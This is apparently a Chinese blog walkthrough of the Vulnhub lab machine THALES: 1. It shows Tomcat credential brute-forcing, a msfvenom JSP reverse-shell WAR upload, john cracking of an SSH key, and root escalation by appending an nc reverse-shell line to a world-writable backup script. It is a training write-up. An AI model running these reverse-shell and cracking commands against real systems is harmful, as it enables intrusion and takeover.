【Vulnhub靶场】THALES: 1

环境准备

下载靶机导入到vmware
在这里插入图片描述

信息收集

我们使用arp-scan命令查找靶机的IP地址
在这里插入图片描述
靶机IP地址为:192.168.2.18
攻击机IP地址为:192.168.2.17
我们使用nmap扫描靶机开启的服务
在这里插入图片描述
发现靶机开放了tomcat和ssh,我们先访问他的tomcat
在这里插入图片描述
在这里插入图片描述

渗透开始

tomcat发现可以登录,我们尝试爆破一下
在这里插入图片描述
在这里插入图片描述
成功爆破出账号密码,我们返回网站登录
发现manager app页面可以上传文件
在这里插入图片描述
我们使用如下命令创建一个反弹shell的木马上传

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.17 LPORT=10086 -f war -o revshell.war

在这里插入图片描述
在这里插入图片描述
上传成功后,我们靶机监听10086端口然后访问页面就可以获取到shell了
在这里插入图片描述
我们把这个shell升级成可以交互的版本
查找一下python的版本
在这里插入图片描述
使用如下命令

python3 -c "import pty;pty.spawn('/bin/bash')"

就可以获得一个交互shell了
在这里插入图片描述
我们查看一下有没有什么有用的信息
在这里插入图片描述
thales目录下有三个比较有用的文件,我们查看notes.txt

I prepared a backup script for you. The script is in this directory "/usr/local/bin/backup.sh". Good Luck.
我给你准备了一个备份脚本。脚本在“/usr/local/bin/backup.sh”目录下。祝你好运。

再查看user.txt发现没有权限
在这里插入图片描述
ssh目录下有公钥
在这里插入图片描述
我们把它保存下来,然后用john去爆破
在这里插入图片描述
使用命令

john --wordlist=/usr/share/wordlists/rockyou.txt /root/crack.txt

就可以爆破了,因为我这边之前测试的时候爆破过了,所以直接查看就行了
在这里插入图片描述
爆破出密码了,我们回到shell那边切换用户
在这里插入图片描述
成功获取到第一个flag

提权

之前我们看到的那个提示还没有用上呢,现在我们查看一下那个备份文件的代码
在这里插入图片描述
是一个shell文件,并且是能运行命令的,我们再看一下这个文件的权限
在这里插入图片描述
发现权限是777,我们是可以编辑的,并且是root用户运行的,我们插入一串反弹shell的命令

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.17 10087 >/tmp/f" >> backup.sh

在这里插入图片描述
然后在攻击机开一个端口监听等待连接就好了可能需要一段时间
在这里插入图片描述
成功获取到root权限,查看flag文件
在这里插入图片描述
实验到此结束

posted @ 2022-03-21 16:17  北の泉  阅读(166)  评论(1)    收藏  举报